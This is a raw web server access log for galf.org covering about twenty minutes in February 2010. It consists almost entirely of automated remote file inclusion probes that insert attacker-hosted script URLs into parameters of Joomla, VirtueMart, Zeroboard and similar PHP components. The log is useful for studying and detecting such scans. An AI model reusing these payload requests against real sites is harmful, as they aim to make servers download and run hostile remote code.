58.230.162.220 - - [14/Feb/2010:20:48:15 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:48:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:48:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:06 -0800] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:06 -0800] "GET /logs/access_100125.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:07 -0800] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:28 -0800] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:28 -0800] "GET /logs/access_100125.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:51:28 -0800] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:51:45 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:52:03 -0800] "GET /logs/access_100111.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:52:13 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:52:16 -0800] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:52:16 -0800] "GET /logs/access_100125.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:20:52:16 -0800] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:52:38 -0800] "GET /logs/access_100111.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:52:48 -0800] "GET /logs/access_100111.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:31 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:31 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:32 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:32 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:32 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:34 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:45 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:46 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:54:46 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:55:00 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:55:00 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:20:55:00 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [14/Feb/2010:20:56:17 -0800] "GET /?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [14/Feb/2010:20:56:17 -0800] "GET /logs/access_100125.log/?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [14/Feb/2010:20:56:17 -0800] "GET /logs/?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:19 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:20 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:20 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:34 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:34 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:56:34 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:02 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:23 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:24 -0800] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:31 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:32 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:32 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:41 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:58:41 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:08 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:08 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:59:28 -0800] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:20:59:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:20:59:41 -0800] "GET /logs/access_091228.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:20:59:41 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:00:02 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:21:00:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:21:00:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:21:00:55 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:01:05 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:01:06 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:21:02:46 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [14/Feb/2010:21:02:50 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:03:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:03:11 -0800] "GET /logs/myevent.php?myevent_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:03:11 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:03:11 -0800] "GET /myevent.php?myevent_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:03:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:03:20 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:03:31 -0800] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:00 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:05 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:05 -0800] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:04:06 -0800] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.179.177.169 - - [14/Feb/2010:21:05:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.179.177.169 - - [14/Feb/2010:21:05:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.179.177.169 - - [14/Feb/2010:21:05:09 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:05:09 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:05:50 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:05:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:21:06:35 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:21:06:35 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:21:06:35 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:28 -0800] "GET /?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:29 -0800] "GET /logs/access_100118.log//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:30 -0800] "GET /logs//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:43 -0800] "GET /logs/access_100118.log//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:43 -0800] "GET /logs//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:07:48 -0800] "GET /?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:21:07:59 -0800] "GET /logs/access_100118.log%20%20//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:21:07:59 -0800] "GET /?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:21:07:59 -0800] "GET /logs//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:21:08:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:21:08:41 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:21:08:41 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:08:53 -0800] "GET /logs/access_090928.log//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:09:18 -0800] "GET /logs/access_090928.log//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:21:09:43 -0800] "GET /logs/access_090105.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
